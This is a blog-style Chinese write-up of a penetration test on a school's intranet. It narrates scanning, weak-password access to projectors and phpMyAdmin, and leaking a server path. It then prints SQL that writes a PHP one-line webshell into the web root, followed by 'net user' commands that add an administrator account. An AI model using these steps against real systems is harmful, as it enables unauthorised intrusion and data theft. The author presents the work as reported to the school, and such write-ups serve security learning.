[xueqi]在校园内网中的一次简单渗透测试

首先设备接入在学校内网，lan网络的掩码是255.255.252.0 我的ip为10.3.16.*

开启扫描器扫了一遍自己网段机器，由于周末发现存活的ip很少，果断扩大扫描网络，增加网络号区间。

一通扫描发现大量的存活的主机，对几个常用端口扫描，发现几个投影仪存活，存在80端口，小伙伴简单研究下，发现web控制界面弱口令，然后可以进行开关机，调节参数等权限。

还发现大量开启135，138,139,445,3389,80,8080等端口的主机，瞬间激动了，知道学校内网安全特差，没想到这么差，小伙伴立刻想到几个高危洞，比如永恒之蓝。

经过嗅探发现内网大多是win7，少量xp，2003，2008,少量开着22的集成设备，路由等设备。

甚至还发现了校园监控的海康录像机ip，简单试了web和ssh下并不存在弱口令。

找到学校内网的oa学籍系统，对主机进行探测，win08sever系统，开了3389，80(学籍系统),8080（某教师xx系统），并未对上述服务进行任何测试，嗅探下，发现此主机竟然还存在在wan上的学校官网（两年前在wan对学校探测过，大量使用cms，基本上一个教学单位和行政部门一个cms，少数弱口令，网站有安全狗）做到这步，只是搜集了主机信息，并未作任何进一步测试，这也让我想明白早年学校一件事。

早几年某天学校通知有一女生收到助学金为由的诈骗电话，家人上当造成经济损失。学校提前通报大量学生家长大量收到来自广西口音的，以“助学金激活先交钱”为借口的诈骗电话，并能完整报出学生姓名，身份证，住址，手机，班级，学号，家长姓名，手机等信息。

当时遭遇此事，我从我搞安全的嗅觉中就觉得一定是学生学籍信息被泄露了。一直以为学籍系统是独立在内网的，一定是从校内职工泄露的。这次更加肯定了学籍被脱裤的推测，推断：攻击者在公网成功入侵学校网站，提权获得主机权限，发现学籍系统脱裤，出售给东南亚地区电诈黑产集团，电诈利用，学生受骗。。。

回到正题，发现大量开着80端口 http服务主机，以及开启了3389，发现一个是经管的竞赛答题平台。扫描后，80 一个cms站，8080一个cms站，445,3389开启。

对网页进行了检查并不sql注入，后台进行弱口令试探，又失败。扫描了一下目录，发现有phpmyadmin数据库web管理后台。甚至于目录下还有数据库备份sql文件。

弱口令进入！想起来sql语句可以直接在目录生成文件，但是不知道网站真实路径，在网页上各种加参数，让其报错，但是只暴露相对路径，并没有爆出绝对路径。经过百度phpmyadmin漏洞，发现有几个文件可以爆出绝对路径，果断试探之后，拿到绝对路径。

http://url/phpmyadmin/themes/darkblue_orange/layout.inc.php

Fatal error: Call to a member function getImgPath() on a non-object in

D:AppServwwwphpMyAdminthemesdarkblue_orangelayout.inc.php on line 67

有了绝对路径，就可以sql命令生成文件了

命令如下（先创建表，里面插入一句话木马，然后查询输出到文件。）

Create TABLE a (cmd text NOT NULL);

Insert INTO a (cmd) VALUES('<?php eval($_POST[cxk]);?>');

select cmd from a into outfile 'C:Program FilesphpStudywwwmbsuning4x.php';

Drop TABLE IF EXISTS a;

权限真大，菜刀成功连接上，然后上传个大马再运行dos命令添加用户。

Net user cxk pass /add 
net loaclgroup administrators 用户名 /add

然后就有管理员权限了。

3389上去，就能搞事情了

至此并未做进一步测试，并及时汇报给学校相关领导!!!

转载请注明作者[Xueqi]与出处！